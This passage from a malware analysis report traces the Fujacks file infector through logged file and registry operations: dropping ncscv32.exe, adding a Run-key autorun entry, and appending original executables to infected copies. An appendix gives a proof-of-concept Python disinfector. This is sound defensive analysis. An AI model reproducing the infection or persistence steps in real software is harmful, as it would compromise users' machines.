Artifact 7: Dropped batch file (81$$.bat) used to replace/clean infected sample.exe
Process Name  Operation  Target                                   Detail
sample.exe    WriteFile  C:\WINDOWS\system32\drivers\ncscv32.exe  Offset: 0, Length: 128
sample.exe    WriteFile  C:\WINDOWS\system32\drivers\ncscv32.exe  Offset: 128, Length: 128
(...)
sample.exe    WriteFile  C:\WINDOWS\system32\drivers\ncscv32.exe  Offset: 68,608, Length: 128
sample.exe    WriteFile  C:\WINDOWS\system32\drivers\ncscv32.exe  Offset: 68,736, Length: 128
sample.exe    WriteFile  C:\WINDOWS\system32\drivers\ncscv32.exe  Offset: 68,864, Length: 74
sample.exe    CloseFile  C:\WINDOWS\system32\drivers\ncscv32.exe
** (...) represents repeating operations

Artifact 8: File operations for dropping malicious PE
Registry Key Modifications:
Key Name:        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Class Name:
Last Write Time: 9/18/2008 - 10:07 AM
Value 0
  Name: nvscv32
  Type: REG_SZ
  Data: C:\WINDOWS\system32\drivers\ncscv32.exe

Artifact 9: Autorun key installed at the initial startup of ncscv32.exe malware
Process Name  Operation                     Target                                   Detail
ncscv32.exe   QueryStandardInformationFile  C:\WINDOWS\system32\drivers\ncscv32.exe  AllocationSize: 69,632, EndOfFile: 68,938, NumberOfLinks: 1, DeletePending: False, Directory: False
ncscv32.exe   WriteFile                     C:\cygwin\bin\run.exe                    Offset: 0, Length: 65,536
ncscv32.exe   WriteFile                     C:\cygwin\bin\run.exe                    Offset: 65,536, Length: 3,402
ncscv32.exe   SetBasicInformationFile       C:\cygwin\bin\run.exe                    CreationTime: 0, LastAccessTime: 0, LastWriteTime: 9/24/2008 9:59:17 AM, ChangeTime: 9/25/2008 7:40:47 AM, FileAttributes: n/a
ncscv32.exe   CloseFile                     C:\WINDOWS\system32\drivers\ncscv32.exe
ncscv32.exe   CloseFile                     C:\cygwin\bin\run.exe

Artifact 10: File operations overwriting infection target with a copy of Fujacks
Process Name  Operation                     Target                                                       Detail
ncscv32.exe   CreateFile                    C:\Documents and Settings\***\Local Settings\Temp\94$$.Ico  DesiredAccess: Generic Read, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: N, ShareMode: Read, Write, AllocationSize: n/a, OpenResult: Opened
ncscv32.exe   QueryStandardInformationFile  C:\Documents and Settings\***\Local Settings\Temp\94$$.Ico  AllocationSize: 4,096, EndOfFile: 766, NumberOfLinks: 1, DeletePending: False, Directory: False
ncscv32.exe   ReadFile                      C:\Documents and Settings\***\Local Settings\Temp\94$$.Ico  Offset: 0, Length: 766
ncscv32.exe   QueryStandardInformationFile  C:\Documents and Settings\***\Local Settings\Temp\94$$.Ico  AllocationSize: 4,096, EndOfFile: 766, NumberOfLinks: 1, DeletePending: False, Directory: False
ncscv32.exe   CloseFile                     C:\Documents and Settings\***\Local Settings\Temp\94$$.Ico

Artifact 11: Temporary icon file is used to preserve original PE icon
Process Name  Operation                     Target                 Detail
ncscv32.exe   CreateFile                    C:\cygwin\bin\run.exe  DesiredAccess: Generic Read/Write, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: N, ShareMode: Read, AllocationSize: n/a, OpenResult: Opened
ncscv32.exe   QueryStandardInformationFile  C:\cygwin\bin\run.exe  AllocationSize: 69,632, EndOfFile: 68,938, NumberOfLinks: 1, DeletePending: False, Directory: False
ncscv32.exe   ReadFile                      C:\cygwin\bin\run.exe  Offset: 68,810, Length: 128
ncscv32.exe   WriteFile                     C:\cygwin\bin\run.exe  Offset: 68,938, Length: 128
(...)
ncscv32.exe   WriteFile                     C:\cygwin\bin\run.exe  Offset: 118,986, Length: 128
ncscv32.exe   WriteFile                     C:\cygwin\bin\run.exe  Offset: 119,114, Length: 24
** (...) represents repeating operations

Artifact 12: Original PE (run.exe) is appended to new infected PE
Appendix B: Sample Fujacks PE Disinfector

##############################################################################
# cleanFile
# - Proof-of-Concept Python function for cleaning a Fujacks infected PE
# - Function lacks necessary error checking and logging
#
import os
import re
import tempfile

def cleanFile(infectedFile):
    MAX_FJ_TAG_SIZE = 256

    # Open Infected File (binary mode: the tag and both PEs are raw bytes)
    infectedFP = open(infectedFile, "rb")

    # Read End of File
    infectedFP.seek(-(MAX_FJ_TAG_SIZE), os.SEEK_END)
    fileChunk = infectedFP.read(MAX_FJ_TAG_SIZE)

    # Search for Fujacks Tag
    # Format of Tag: WHBOY<original name>.exe<0x02><original size><0x01>
    fjTagRE = rb"WHBOY(.*\.exe)\.exe.([0-9]*)."
    fjTagPattern = re.compile(fjTagRE)
    mobj = fjTagPattern.search(fileChunk)
    if mobj is None:
        infectedFP.close()
        raise ValueError("no Fujacks tag found in " + infectedFile)

    # Parse Fujacks Tag
    fjTagLoc = MAX_FJ_TAG_SIZE - mobj.start()   # bytes from tag start to EOF
    fnameOrigPE = mobj.group(1).decode("latin-1")
    sizeOrgPE = int(mobj.group(2))

    # Write Clean PE
    # (+1 skips the single byte that sits between the original PE and the tag)
    locOrigPE = fjTagLoc + sizeOrgPE + 1
    infectedFP.seek(-(locOrigPE), os.SEEK_END)
    tmpFd, cleanPath = tempfile.mkstemp(suffix=".clean", text=False, dir=".")
    os.write(tmpFd, infectedFP.read(sizeOrgPE))
    infectedFP.close()
    os.close(tmpFd)

    # Restore Original PE
    os.rename(infectedFile, infectedFile + ".infected")
    os.rename(cleanPath, fnameOrigPE)

Appendix B: Proof-of-concept Python function for cleaning a Fujacks infected PE